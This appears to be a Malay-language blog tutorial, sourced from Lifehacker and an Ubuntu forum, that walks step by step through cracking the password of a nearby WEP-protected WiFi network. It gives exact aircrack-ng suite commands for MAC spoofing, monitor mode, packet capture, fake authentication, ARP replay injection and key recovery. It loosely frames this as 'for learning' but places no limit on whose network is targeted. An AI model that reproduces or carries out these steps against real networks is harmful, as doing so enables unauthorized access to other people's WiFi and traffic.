WEP merupakan sejenis encryption untuk password WiFi. Ia dah tak banyak digunakan lagi kerana sangat lemah dan mudah dipecahkan. Bagi tujuan pembelajaran, kali ini saya akan tunjukkan betapa mudahnya untuk crack password WiFi yang menggunakan WEP.

Apa yang anda perlukan:

• Sebiji wireless adapter yang boleh melakukan packet injection. Biasanya wireless adapter yang terbina pada laptop anda tidak mempunyai fungsi ini, jadi anda perlu dapatkannya daripada kedai ataupun secara online. Saya menggunakan Alfa AWUS050NH yang saya beli dari eBay, kira-kira RM70.
• Linux sebagai operating system. Anda juga boleh menggunakan Backtrack Live CD tetapi saya lebih selesa menggunakan Ubuntu Linux sepenuhnya.

Tutorial ini lebih senang diikuti jika anda biasa dengan Linux, serta biasa menggunakan command line pada Linux. Saya hanya akan masukkan arahan yang paling penting sahaja, namun biasanya anda mungkin akan perlu pasang beberapa software untuk memastikannya berjaya. 

Cara-cara crack password WiFi yang menggunakan WEP

1. Buka terminal. Pertama sekali, anda perlu mendapatkan nama interface bagi wireless adapter anda:

airmon-ng

Pada komputer saya, interface bagi wireless adapter saya adalah wlan1. Komputer anda mungkin berbeza, jadi ingat nama tersebut untuk digunakan pada arahan-arahan seterusnya.

2. Jalankan arahan berikut. Gantikan (interface) dengan nama yang baru anda dapat tadi.

airmon-ng stop (interface)
ifconfig (interface) down
macchanger --mac 00:11:22:33:44:55 (interface)
airmon-ng start (interface)

3. Senaraikan semua WiFi yang ada berdekatan.

airodump-ng (interface)

Pilih rangkaian WiFi mana yang anda ingin crack, dan salin BSSID, channel, dan nama rangkaian tersebut. Pastikan rangkaian yang anda pilih itu menggunakan WEP.

4. Jalankan arahan berikut menggunakan maklumat yang anda baru dapat tadi. Gunakan apa sahaja nama fail yang anda mahu bagi (nama fail). Biarkan proses ini berjalan.

airodump-ng -c (channel) -w (nama fail) --bssid (bssid) (interface)

5. Buka satu terminal yang lain dan jalankan arahan ini pula. (essid) adalah nama rangkian WiFi yang anda ingin crack.

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)

Jika ia berjaya, mesej “Association successful” akan dipaparkan.

6. Jalankan arahan ini untuk mula mengumpul data tentang pasword WiFi yang anda ingin crack.

aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)

7. Kembali ke skrin pada langkah 4 dan perhatikan bahagian #Data. Tunggu sehingga bahagian ini berjaya mengumpul sekitar 10’000 data sebelum anda pergi ke langkah seterusnya. Biasanya proses ini hanya mengambil masa kira-kira 5 ke 10 minit.

8. Setelah cukup mengumpul data, tibalah masa untuk mendapatkan password. Buka satu lagi terminal dan jalan arahan ini.

aircrack-ng -b (bssid) (nama fail.cap)

Sekiranya berhasil, mesej “Key Found” akan dipaparkan beserta password yang berjaya anda crack. Anda sudah berjaya!

Rujukan: Lifehacker

Kemaskini: Jika anda mempunyai masalah dengan channel, gunakan arahan ini untuk menukar channel bagi antaramuka wireless anda. (interface) adalah antaramuka kad wireless, dan $ adalah nombor channel tersebut:

ifconfig (interface) down
iwconfig (interface) mode managed
ifconfig (interface) up
iwconfig (interface) channel $
ifconfig (interface) down
iwconfig (interface) mode monitor
ifconfig (interface) up

Rujukan: Forum Ubuntu